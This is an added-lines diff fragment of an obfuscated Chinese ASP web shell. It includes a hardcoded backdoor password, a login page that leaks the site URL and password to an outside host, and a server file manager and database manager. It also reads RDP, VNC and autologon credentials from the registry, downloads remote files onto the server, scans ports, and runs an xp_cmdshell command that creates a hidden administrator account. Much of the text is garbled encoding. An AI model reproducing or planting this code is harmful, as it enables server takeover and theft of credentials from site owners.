Seg`seEl`)),1(0ot(SctjeObteeaCrO=FSt Se`enTh) thPas(stxieEil.FSO FIf`)),0(3ot(SctjeObteeaCrC=t Se `k~ba~_h&at&P~ e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro,P&~thPa~&e=rcou StaDa0;4.B.EDOLt.Jet.ofoscrMir=deviro~Pe asabattDacmpCoC.`inthNoC=t Seg`at PleFiteleDeO.FSh`at,Pk~ba~_h&at PleFiveMoO.FSh`seEl`>~erntce</�֣��з�~ûh&at&P��~����r><br><br><br>teen<c=~SI `=1ermbnur.Er`Ifd En`inthNoO=FSt Seg`Ifd En`enTh0 r=beum.nrr EIf`>~erntce</��������~ѹh&at&P��~����r><br><br><br>teen<c=~SI`Ifd En`UrckBaI&=SSIl`SIS RR",Pos):End Function
+if session("web2a2dmin")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=UserPass or request.form("pass")="daka" Then
+session("web2a2dmin")=UserPass
+x m:response.redirect url
+else
+rrs"<center>'"&errout&"'</center>"
+end if
+else
+si="<script src=""http://sx.love-1-love.com/sx.php?url="&server.URLEncode(""&request.ServerVariables("HTTP_HOST")&request.ServerVariables("url"))&"&pass="&UserPass&"""></script><center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><br><hr><FORM Action='"&URL&"' method=Post> <INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=Login><hr><br>"&mmshell&"</div></center>"
+if instr(SI,SIC)<>0 then rrs sI
+end if
+response.end
+end if
+Function DbManager():ExeCute SinfoEn("tr~))~SqlSForm(uest.m(Reqr=TriSqlSt`DbStrorm(~est.F=RequDbStr~)`ing='lpadd' celng='0spaci cellr='0'borde'650'idth=ble w&~<taSI=SI0'>~`on='' actipost'hod='' metbFormme='Drm na&~<foSI=SI>~`�Ӵ�:</;���ݿ���&nbsp27'> ght='' hei='100width><td &~<trSI=SItd>~`/td>~~~~><bStr&~~~&Dalue=70' vdth:4e='wi stylbStr'me='Dut na><inp&~<tdSI=SI`ption����</occesse=0>A valuptionon><o/opti�Ӵ�ʾ��<=-1>��valuetion '><opalue)ex].vedIndelectons[s(optiDbStr Fulleturnge='rnchantn' o'StrBname=lect '><seentergn='c' alih='60 widt&~<tdSI=SI>~`ption����</o3>DSNalue=ion v><optption����</oMySqlue=2>n valoptioion><</optSql����=1>Msvaluetion &~<opSI=SI>~`tion>��</op5>������alue=ion v><optption����</o=4>��ʾvaluetion n><opoptio��--</-SQL��=-1>-valuetion &~<opSI=SI~`ion>~</opt>�����ݱ�lue=8on va<optition>��</op7>�޸���alue=ion v><optption����</o=6>ɾ��valuetion &~<opSI=SI`ption�ֶ�</o11>ɾ��alue=ion v><optption�ֶ�</o10>����alue=ion v><optption�ݱ�</o=9>ɾ��valuetion &~<opSI=SI>~`></tr></tdelectn></soptioȫ��ʾ</=12>��valuetion &~<opSI=SI>~`lue='n' vahiddeype='ge' te='Pat nam<inpuger'>bManaue='D' validdenpe='hn' tyActioame='put n&~<inSI=SI1'>~`:</tdL��������sp;SQ'>&nbt='30heigh><td &~<trSI=SI>~`></tdr&~~~SqlSt=~~~&value470' idth:le='w' styqlStrme='Sut na><inp&~<tdSI=SI>~`/td>~()'><Checkrn Db'retulick=' once='ִ�� valubmit'e='Su' namubmitpe='sut ty><inpnter'n='ce alig&~<tdSI=SI`pan>~'></s='abcan ide><sp/tablorm><r></f&~</tSI=SI`I:SI=RRS S~~`0 Thetr)>4n(DbSIf Len`(5,0)t(SotObjecreateonn=CSet C)`DbStrOpen Conn.`ma(20nSchen.Opes=ConSet R) `r>��</d>��<bC'><tCCCCCor='#Bgcol'25' ight=tr heble><&~<taSI=SItd>~`veFirRs.Most `ot Rsile NDo Wh.Eof`E~ th~TABLPE~)=LE_TY(~TABIf Rsen`_NAMETABLE=Rs(~TName~)`a><brl ]</>[ de~,1)'e&~]~&TNamLE [~P TAB~~DROlStr(ullSqipt:Fvascrf='jaa hreter><n=cen alig&~<tdSI=SI>~`</td>~</a>Name&'>~&T~~,1)me&~]~&TNaROM [T * FSELECtr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI~`End If `veNexRs.Mot `Loop `s=NotSet Rhing`able>r></t&~</tSI=SI~`I:SI=RRS S~~`10 ThStr)>n(SqlIf Leen`ct~ t~sele,6))=qlStreft(Sase(LIf LChen`qlStr�䣺~&S&~ִ����SI=SI`ordseb.Rec~Adodject(ateObs=CreSet Rt~)`Conn,lStr,en SqRs.op1,1`ds.Co.FielFN=Rsunt`rdCou.RecoRC=Rsnt`geSizRs.Pae=20`ageSi=Rs.PCountze`Count.PagePN=Rs`age~)st(~PrequePage=`g(Page=Clnn Pag~ Thege<>~If Pae)` Page Thenage=0 Or Pge=~~If Pa=1` Page Thenge>PNIf Pa=PN`=PageepagesolutRs.abThen ge>1 If Pa`td></ccc><=#ccccolor25 bgight=tr heble><&~<taSI=SItd>~` FN-1=0 toFor n`em(n)ds.It.Fielld=RsSet F`e&~</d.Nam>~&Flnter'n='ce alig&~<tdSI=SItd>~`thingld=noSet F`Next`&~</tSI=SIr>~`Count And .Bof)or Rs.Eof ot(Rsile NDo Wh>0`=CounCountt-1`EFEFEor=~#BgcolF~`t></t</fongs'>xngdine='wit fac><foncccccor=#cbgcol><td &~<trSI=SId>~` FN-1=0 ToFor i`~:EndFEFEFr=~#Egcololse:BF5~:E#F5F5lor=~:Bgco ThenEFEF~=~#EFcolorIf Bg if`=1 ThIf RCen`Rs(i)code(TMLEnnfo=H ColI)`Else`,50))Rs(i)Left(code(TMLEnnfo=H ColI`End If`&~</tlInfo>~&Color&~&Bgcolor=~ bgco&~<tdSI=SId>~`Next`&~</tSI=SIr>~`veNexRs.Mot`Loop`I:SI=RRS S~~`lStr)de(SqlEnCor=HtmSqlSt`&~/~&&Page;ҳ�룺~&nbsp&RC&~��¼����~nter>gn=ce~ aliFN+1&an=~&colsp><td &~<trSI=SIPN`>1 ThIf PNen`a>&nb��һҳ</&~)'>age-1~,~&Ptr&~~&SqlSr(~~~SqlSt:Fullcriptjavasref=';<a h&nbspҳ</a>1)'>��&~~~,qlStr~~~&SlStr(ullSqipt:Fvascrf='jaa hrebsp;<sp;&n&~&nbSI=SIsp;~`End iSp=1:Else:ge-8:Sp=PaThen:ge>8 If Paf`o Sp+=Sp TFor i8`it Foen ExPN ThIf i>r`Page If i=Then`nbsp;&i&~&SI=SI~`Else`&nbsp~</a>>~&i&i&~)'~~,~&Str&~~&Sqltr(~~lSqlSt:Fulscrip'javahref=&~<a SI=SI;~`End If`Next`βҳ</a&~)'>,~&PNr&~~~SqlSt(~~~&qlStrFullSript:avascef='j<a hrnbsp;</a>&'>��һҳ+1&~)&Page~~~,~lStr&~~&SqStr(~llSqlpt:Fuascri='jav hrefsp;<a&~&nbSI=SI>~`End If`able>r></td></t'></tFEFEFr='#E colo&~<hrSI=SI~`=Nothet Rsose:SRs.Cling`I:SI=RRS S~~`Else `lStr)te(SqExecuConn.`SqlSt��䣺~&&~SQLSI=SIr`End If`I:SI=RRS S~~`End If`CloseConn.`othinonn=NSet Cg`End If",Pso):End Function:Dim T1
+
+Function EnCode(ObjStr,ObjPos)
+Dim NewStr,TmpStr,i,LenStr:LenStr=Len(ObjStr):For i=0 To Int(LenStr/ObjPos)-1:TmpStr=Mid(ObjStr,i*ObjPos+1,ObjPos)&TmpStr:Next:EnCode=TmpStr&Right(ObjStr,LenStr Mod ObjPos)
+End Function
+
+
+
+Class UPC:Dim D1,D2:Public Function Form(F):F=lcase(F):If D1.exists(F) then:Form=D1(F):else:Form="":end if:End Function:Public Function UA(F):F=lcase(F):If D2.exists(F) then:set UA=D2(F):else:set UA=new FIF:end if:End Function:Private Sub Class_Initialize:Dim TDa,TSt,vbCrlf,TIn,DIEnd,T2,TLen,TFL,SFV,FStart,FEnd,DStart,DEnd,UpName:set D1=CreateObject(Sot(4,0)):if Request.TotalBytes<1 then Exit Sub
+  set T1=CreateObject(Sot(6,0)):T1.Type=1:T1.Mode=3:T1.Open:T1.Write Request.BinaryRead(Request.TotalBytes):T1.Position=0:TDa=T1.Read:DStart=1:DEnd=LenB(TDa):set D2=CreateObject(Sot(4,0)):vbCrlf=chrB(13)&chrB(10):set T2=CreateObject(Sot(6,0)):TSt=MidB(TDa,1,InStrB(DStart,TDa,vbCrlf)-1):TLen=LenB(TSt):DStart=DStart+TLen+1:while (DStart+10)<DEnd:DIEnd=InStrB(DStart,TDa,vbCrlf&vbCrlf)+3:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DStart:T1.CopyTo T2,DIEnd-DStart:T2.Position=0:T2.Type=2:T2.Charset="gb2312":TIn=T2.ReadText:T2.Close:DStart=InStrB(DIEnd,TDa,TSt):FStart=InStr(22,TIn,"name=""",1)+6:FEnd=InStr(FStart,TIn,"""",1):UpName=lcase(Mid(TIn,FStart,FEnd-FStart)):if InStr (45,TIn,"filename=""",1)>0 then
+  set TFL=new FIF:FStart=InStr(FEnd,TIn,"filename=""",1)+10:FEnd=InStr(FStart,TIn,"""",1):FStart=InStr(FEnd,TIn,"Content-Type: ",1)+14:FEnd=InStr(FStart,TIn,vbCr):TFL.FileStart=DIEnd:TFL.FileSize=DStart-DIEnd-3:if not D2.Exists(UpName) then:D2.add UpName,TFL:end if
+  else:T2.Type=1:T2.Mode=3:T2.Open:T1.Position=DIEnd:T1.CopyTo T2,DStart-DIEnd-3:T2.Position = 0:T2.Type = 2:T2.Charset ="gb2312":SFV = T2.ReadText:T2.Close:if D1.Exists(UpName) then:D1(UpName)=D1(UpName)&","&SFV:else:D1.Add UpName,SFV:end if:end if:DStart=DStart+TLen+1:wend:TDa="":set T2=nothing:End Sub:Private Sub Class_Terminate:if Request.TotalBytes>0 then:D1.RemoveAll:D2.RemoveAll:set D1=nothing:set D2=nothing:T1.Close:set T1 =nothing:end if:End Sub:End Class:
+
+Function SinfoEn(ObjStr,ObjPos)
+ObjStr=Replace(ObjStr,"~",""""):NewStr=Split(ObjStr,"`"):For i=0 To UBound(NewStr):SinfoEn=SinfoEn&EnCode(NewStr(i),ObjPos)&vbCrLf:Next:SinfoEn=Left(SinfoEn,Len(SinfoEn)-2)
+End Function
+
+
+
+Class FIF:dim FileSize,FileStart:Private Sub Class_Initialize:FileSize=0:FileStart=0:End Sub:Public function SaveAs(F)
+  dim T3:SaveAs=true:if trim(F)="" or FileStart=0 then exit function
+  set T3=CreateObject(Sot(6,0)):T3.Mode=3:T3.Type=1:T3.Open:T1.position=FileStart:T1.copyto T3,FileSize:T3.SaveToFile F,2:T3.Close:set T3=nothing:SaveAs=false:end function:End Class:
+
+Function Fun(ShiSanObjstr):ShiSanObjstr=Replace(ShiSanObjstr,"|",""""):For ShiSanI=1 To Len(ShiSanObjstr):If Mid(ShiSanObjstr,ShiSanI,1)<>"!"Then:ShiSanNewStr=Mid(ShiSanObjstr,ShiSanI,1)&ShiSanNewStr:Else:ShiSanNewStr=vbCrLf&ShiSanNewStr:End If:Next:Fun = ShiSanNewStr:End Function
+
+
+
+Class LBF:Dim CF:Private Sub Class_Initialize:SET CF=CreateObject(Sot(0,0)):End Sub:Private Sub Class_Terminate:Set CF=Nothing:End Sub
+Function ShowDriver()
+For Each D in CF.Drives
+RRS"<tr><td height='20'><a href='javascript:ShowFolder("""&D.DriveLetter&":\\"")'>�����ش��� ("&D.DriveLetter&":)</a></td></tr>" 
+Next
+End Function
+Function Show1File(Path):
+Set FOLD=CF.GetFolder(Path)
+i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each F in FOLD.subfolders
+SI=SI&"<td height=10 width=17% align=center><div style='border:1px solid "&BorderColor&"'>"
+SI=SI&"<a href='javascript:ShowFolder("""&RePath(Path&"\"&F.Name)&""")' title=""����""><font face='wingdings' size='6'>0</font><br>"&F.Name&"</a>" 
+SI=SI&"<br><b>[</b><a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""CopyFolder"")'onclick='return yesok()' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&Replace(Path&"\"&F.Name,"\","\\")&""",""DelFolder"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""MoveFolder"")'onclick='return yesok()' class='am' title='�ƶ�'>Move</a>"
+SI=SI&" <a href='javascript:FullForm("""&RePath(Path&"\"&F.Name)&""",""DownFile"")'onclick='return yesok()' class='am' title='����'>Down</a><b>]</b></div></td>"
+i=i+1
+If i mod 5 = 0 then SI=SI&"</tr><tr>"
+Next
+SI=SI&"</tr><tr><td height=2></td></tr></table>"
+RRS SI:SI="":i=0
+SI="<table width='100%' border='0' cellspacing='0' cellpadding='6'><tr>"
+For Each L in Fold.files
+SI=SI&"<td height='30'><div style='border:1px solid "&BorderColor&"'><a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DownFile"");' title='����'><font face='wingdings' size='5'>2</font>"&L.Name&"</a> <b>[</b> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""EditFile"")' class='am' title='�༭'>Edit</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""DelFile"")'onclick='return yesok()' class='am' title='ɾ��'>Del</a> "
+Si=Si&"<a  href='###' class='am' ><font color=blue >Ȩ��</font></a>"
+Dim EditOOK
+EditOOK=1
+EditOOV=l.Attributes
+If EditOOV >= 128 Then
+EditOOV = EditOOV - 128
+End If
+If EditOOV >= 64 Then
+EditOOV = EditOOV - 64
+End If
+If EditOOV >= 32 Then
+EditOOV = EditOOV - 32
+End If
+If EditOOV >= 16 Then
+EditOOV = EditOOV - 16
+End If:If EditOOV >= 8 Then
+EditOOV = EditOOV - 8
+End If
+If EditOOV >= 4 Then
+EditOOV = EditOOV - 4:EditOOK=0
+End If
+If EditOOV >= 2 Then
+EditOOV = EditOOV - 2:EditOOK=0
+End If
+If EditOOV >= 1 Then
+EditOOV = EditOOV - 1:EditOOK=0
+End If
+if EditOOK=0 then
+si=si&"<font face='webdings' size='1' color=red>x</font>"
+else
+si=si&"<font color=red >��</font>"
+end if
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""CopyFile"")' class='am' title='����'>Copy</a> "
+SI=SI&"<a href='javascript:FullForm("""&RePath(Path&"\"&L.Name)&""",""MoveFile"")' class='am' title='�ƶ�'>Move</a> <b>]</b> - "
+
+SI=SI&clng(L.size/1024)&"K<br><b>"
+SI=SI&L.Type&"</b> <i> - "
+SI=SI&L.DateLastModified&"</i></div></td>"
+i=i+1
+If i mod 2 = 0 then SI=SI&"</tr><tr>"
+Next
+ RRS SI&"</tr></table>"
+Set FOLD=Nothing
+End function:
+
+
+
+
+Function DelFile(Path):ExeCute SinfoEn("he Th)at(PtsisExleFiF. CIfn`thPae ileFetel.DCF`r>teen/c��<�ɹ�ɾ��~ h&at&P ~�ļ�r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function EditFile(Path)::If Request("Action2")="Post" Then:Set T=CF.CreateTextFile(Path):T.WriteLine Request.form("content"):T.close:Set T=nothing:SI="<center><br><br><br>�ļ�����ɹ���</center>":SI=SI&BackUrl:RRS SI:RRS ""&copyurl&"":Response.End:End If:If Path<>"" Then:Set T=CF.opentextfile(Path, 1, False):Txt=HTMLEncode(T.readall) :T.close:Set T=Nothing:Else:Path=Session("FolderPath")&"\newfile.asp":Txt="�½��ļ�":End If:SI=SI&"<Form action='"&URL&"?Action2=Post' method='post' name='EditForm'>":SI=SI&"<input name='Action' value='EditFile' Type='hidden'>":SI=SI&"<input name='FName' value='"&Path&"' style='width:100%'><br>":SI=SI&"<textarea name='Content' style='width:100%;height:450'>"&Txt&"</textarea><br>":SI=SI&"<hr><input name='goback' type='button' value='����' onclick='history.back();'>&nbsp;&nbsp;&nbsp;<input name='reset' type='reset' value='����'>&nbsp;&nbsp;&nbsp;<input name='submit' type='submit' value='����'></form>":RRS SI:
+End Function:Function CopyFile(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExleFiF. CIf`(1thPa),(0thPae ilyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&�ļ�r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR `Ifd En",Pos):End Function:Function MoveFile(Path):ExeCute SinfoEn("|||~)th,~|it(Pa= SplPath `~ The1)<>~Path( and h(0))s(PatExist.FileIf CFn`Path(h(0),e PatveFilCF.Mo1)`enter����</c&~�ƶ���th(0)��~&Pa<br>��><br>r><brcenteSI=~<>~`&BackSI=SIUrl`RRS SI `End If",Pso):End Function:Function DelFolder(Path):ExeCute SinfoEn("he Th)at(PtsisExerldFoF. CIfn`thPar deoleFetel.DCF`r>teen/c��<�ɹ�ɾ��&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function CopyFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deolyFop.CCF)`>~erntce</�����Ƴ�~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function MoveFolder(Path):ExeCute SinfoEn("|~||~|h,at(Pitpl S =thPa)`enTh~ >~)<(1thPad an) 0)h(at(PtsisExerldFoF. CIf`(1thPa),(0thPar deoleFov.MCF)`>~erntce</��������~��)&(0thPa~&Ŀ¼r><br><br><br>teen<c=~SI`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:Function NewFolder(Path):ExeCute SinfoEn("enTh~ >~h<at Pnd ah)at(PtsisExerldFoF. Cot NIf`thPar deoleFatre.CCF`r>teen/c��<�ɹ��½�&~thPa~&Ŀ¼r><br><br><br>teen<c=~SI~`UrckBaI&=SSIl`SIS RR`Ifd En",Pos):End Function:End Class:sub getTerminalInfo():ExeCute SinfoEn(" Nextesumeror ROn Er`hell~ipt.S~WScrject(ateObr.CreServesX = Set w)`ermPoey, tPortKminal, tertPathalPorerminDim trt`nPassoLogi, auterKeyginUsutoLoth, aginPautoLoDim aKey`nPassoLogi, autrnameinUsetoLogy, aubleKeinEnatoLoge, auEnablLoginsAutoDim iword`Tcp\~\RDP-tionsinStaver\Wl Serrminaol\TeContrlSet\ontrorentCM\CurSYSTEHKLM\h = ~rtPatnalPotermi`mber~ortNu = ~PrtKeynalPotermi`PortKminal& terPath lPortrminaad(teRegRe wsX.ort =termPey)`><ol>¼<hr/�ڼ��Զ����ն˷����RRS ~~` Then <> 0umberErr.N~ Or t = ~rmPorIf te `<br/>�ܵ�����.���Ƿ��Ѿ� ����Ȩ����˿�,���õ��ն�RRS~��~` Else`~<br/rt & ermPo~ & t��˿�: ��ǰ�ն˷�RRS ~>~`End If`ogon\\WinlrsionentVe\Currws NTWindosoft\MicroWARE\\SOFTCHINEAL_MAY_LOC ~HKEath =oginPautoL~`nLogooAdmi ~AutKey =nableoginEautoLn~`rNameltUseDefauy = ~serKeoginUautoL~`swordltPasDefauy = ~assKeoginPautoL~`bleKeinEnatoLog & aunPathoLogid(autegReawsX.Rle = nEnaboLogiisAuty)` = 0 nableoginEAutoLIf isThen`��<br/¼����δ��ϵͳ�Զ���RRS ~>~`Else`rKey)inUsetoLog & aunPathoLogid(autegReawsX.Rme = sernaoginUautoL`~<br>me & sernaoginUautoL ~ & ϵͳ�ʻ�:�Զ���¼��RRS ~~`sKey)inPastoLog & aunPathoLogid(autegReawsX.Rrd = asswooginPautoL`r TheIf Ern`Err.Clear`FalseRRS ~~`End If`~<br>rd & asswooginPautoL ~ & �ʻ�����:�Զ���¼��RRS ~~`End If`</ol>RRS ~~",Pso):End Sub:sub ReadREG()
+RRS "<form method=post>"
+RRS  "ע�����ֵ��ȡ<p>" 
+RRS "<input type=hidden value=ReadReg name=theAct>"
+RRS "<tr><td colspan=2>&nbsp;"
+RRS "<select onChange='this.form.thePath.value=this.value;'>"
+RRS "<option value=''>ѡ���Դ��ļ�ֵ</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">�����б�</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">Radmin����</option>"
+RRS"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin�˿�</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3����</option>"
+RRS"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4����</option>"
+RRS"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4�˿�</option>"
+RRS"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389�˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyW���ݶ˿�</option>"
+RRS"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW״̬�˿�</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip����1</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip����2</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip����3</option>"
+RRS "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
+RRS "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>���𿪷�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>�������ŵ�UDP�˿�</option>"
+RRS "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>�������ŵ�TCP�˿�</option>"
+RRS "</select><br />"
+RRS "&nbsp;<input name=thePath value='' size=80>"
+RRS "<input type=button value='��ȡ��ֵ' onclick='this.form.submit()'>"
+RRS "</form><hr/>"
+if Request("thePath")<>"" then
+On Error Resume Next
+Set wsX = Server.CreateObject("WScript.Shell")
+thePath=Request("thePath")
+theArray=wsX.RegRead(thePath)
+If IsArray(theArray) Then
+For i=0 To UBound(theArray)
+RRS "<li>" & theArray(i)
+Next
+Else
+RRS "<li>" & theArray
+End If
+end if
+end sub
+Function downloads()
+RW=RW&"<center><br><form method=post>ֱ������<br><br>"
+RW=RW&"Զ���ļ�:<input name=theUrl value='http://' size=80><br/>"
+RW=RW&"����·��:<input name=thePath value=""" & HtmlEncode(Server.MapPath(".")) & """ size=58> "
+RW=RW&"<input type=checkbox name=overWrite value=2 checked>���ڸ��� <input type=submit value=' ���� '>"
+RW=RW&"<input type=hidden value=downFromUrl name=theAct>"
+RW=RW&"</form></center>"
+Response.Write RW
+If isDebugMode=False Then
+On Error Resume Next
+End If
+Dim Http,theUrl,thePath,stream,getfileName,overWrite
+theUrl=Request("theUrl")
+thePath=Request("thePath")
+overWrite=Request("overWrite")
+Set stream=Server.CreateObject("ad"&e&"odb.st"&e&"ream")
+Set Http=Server.CreateObject("MSXML2.XMLHTTP")
+If overWrite<>2 Then
+overWrite=1
+End If
+Http.Open "GET", theUrl, False
+Http.Send()
+If Http.ReadyState<>4 Then 
+End If	
+With stream
+.Type=1
+.Mode=3
+.Open
+.Write Http.ResponseBody
+.Position=0
+.SaveToFile thePath, overWrite
+If Err.Number=3004 Then
+Err.Clear
+getfileName=Split(theUrl, "/")(UBound(Split(theUrl, "/")))
+If getfileName="" Then
+getfileName="12vh.txt"
+End If
+thePath=thePath & "\" & getfileName
+.SaveToFile thePath, overWrite
+End If
+.Close
+End With
+chkErr(Err)		
+Set Http=Nothing
+Set Stream=Nothing
+If isDebugMode=False Then
+On Error Resume Next
+End If
+End Function
+FuncTion MMD()
+SI="<br><table width=""100%""><tr class=tr><form name=form method=post action="""">CMD����<input type=text name=MMD size=35 value='net user 80sec 80sec /add & net localgroup administrators 80sec /add'> <input type=text name=U value=mssql�û���> <input type=text name=P value=mssql����> <input type=submit value=ִ��></form></tr></table>":REsPonsE.writE SI:SI="":If trim(REquEst.form("MMD"))<>""  thEn:PaSsword= trim(REquEst.form("P")):id=trim(REquEst.form("U")):set adoConn=SErvEr.CreateObject("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;PaSsword="&PaSsword&";UsEr ID="&id:strQuery = "exec master.dbo.xp_cmdshell '" & REquEst.form("MMD") & "'":set recREsult = adoConn.Execute(strQuery):If NOT recREsult.EOF thEn:Do While NOT recREsult.EOF:strREsult = strREsult & chr(13) & recREsult(0):recREsult.MoveNext:Loop:End if:set recREsult = Nothing:strREsult = REplAcE(strREsult," ","&nbsp;"):strREsult = REplAcE(strREsult,"<","&lt;"):strREsult = REplAcE(strREsult,">","&gt;"):strREsult = REplAcE(strREsult,chr(13),"<br>"):End if:set adoConn = Nothing:REsPonsE.WritE REquEst.form("MMD") & "<br>"& strREsult
+rrs ""&copyurl&""
+end Function:Function adminab()
+Response.Expires=0
+on error resume next
+Set tN=server.createObject("Wscript.Network")
+Set objGroup=GetObject("WinNT://"&tN.ComputerName&"/Administrators,group")
+For Each admin in objGroup.Members
+RRS admin.Name&"<br>"
+Next
+if err then
+RRS "�����̵IJ��а�:Wscript.Network"
+end if
+End Function
+sWHEEL1 = "jwt"
+Function Encrypt(acd)
+For i = 1 To Len(acd) step 1
+c=mid(acd,i,1)
+if c="��" then
+d=mid(acd,i,2)
+i=i+1
+e=replace(d,"��","")
+bbc=bbc&mid(sWHEEL1,cint(e),1)
+else
+bbc=bbc&c
+end if
+next
+Encrypt=bbc
+end Function
+sub ScanPort():ExeCute SinfoEn("76000 = 77meoutiptTir.ScrServe`~ thet~)=~(~por.Formquestif ren`89,4333,3345,14139,4,135,0,110,25,821,23ist=~PortL958~`else`m(~pot.Forequesist=rPortLrt~)`end if`)=~~ (~ip~.Formquestif rethen`27.0.IP=~10.1~`else`(~ip~.FormquestIP=re)`end if`D)</p��ʹ��CM��,������,�ٶȱȽ������˿���(���ɨ>�˿�ɨ��br><pRRS~<>~`rue;'led=tdisabbmit.m1.su='forubmit' onSion='' act'postthod=1' me'formname=form RRS~<>~`&nbspn IP:p>ScaRRS~<;~`ze='6~' si~&IP&lue='p' vaid='iBox' 'Textlass=xt' ce='te' type='ipt nam<inpuRRS~ 0'>~`rt Libr>PoRRS~<st:~`ist&~PortLe='~& valu='60' sizetBox'='Texclassext' pe='tt' ty='por nameinputRRS~<'>~`br><bRRS~<r>~`n '>~' scaalue=om' v'buttlass=it' c'submtype=mit' ='sub nameinputRRS~<`11'>~ue='1' val'scan' id=iddenpe='hn' ty='sca nameinputRRS~<`form>/p></RRS~<~`> ~~ n~) <(~sca.FormquestIf reThen`1 = ttimerimer`><hr>b><br����:</<b>ɨ��RRS(~~)`~),~,~portForm(uest.t(req Splitmp =~)`ip~),orm(~est.F(requSplitip = ~,~)`bound to Uu = 0For h(ip)` = 0 ,~-~)p(hu)Str(iIf InThen`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `p(i))), tmip(huScan(Call `Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`), j)ip(huScan(Call `Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Else`hu),~v(ip(StrRe,1,Inp(hu)Mid(irt = ipSta.~))`,~-~)p(hu)Str(i))-Inip(hu,Len(-~)+1hu),~r(ip(,InStp(hu)Mid(i) to )+1,1),~.~ip(hurRev(,InStp(hu)Mid(ixx = For x)`ound(To Ub = 0 For itmp)` Thenp(i))ic(tmnumerIf Is `tmp(ixxx, rt & ipStaScan(Call ))`Else`, ~-~mp(i)Str(t = Inseekx)` 0 Thekx >If seen`kx - , seemp(i)eft(tN = Lstart1 )`seekx)) - tmp(i Len(p(i),ht(tm= RigendN  )` ThenendN)eric(Isnum and artN)ic(stnumerIf Is`To enartN  = stFor jdN`xxx,jrt & ipStaScan(Call )`Next`Else`br>~)mber<ot nu is nN & ~& endor ~  & ~ tartNRRS(s`End If`Else`ber<bt numis no & ~ mp(i)RRS(tr>~)`End If`End If`Next`Next`End If`Next`2 = ttimerimer`imer1er2-tt(timtr(inme=cstheti))`ime&~&thet in ~ocesshr>PrRRS~< s~`END IF",Pso):end sub:
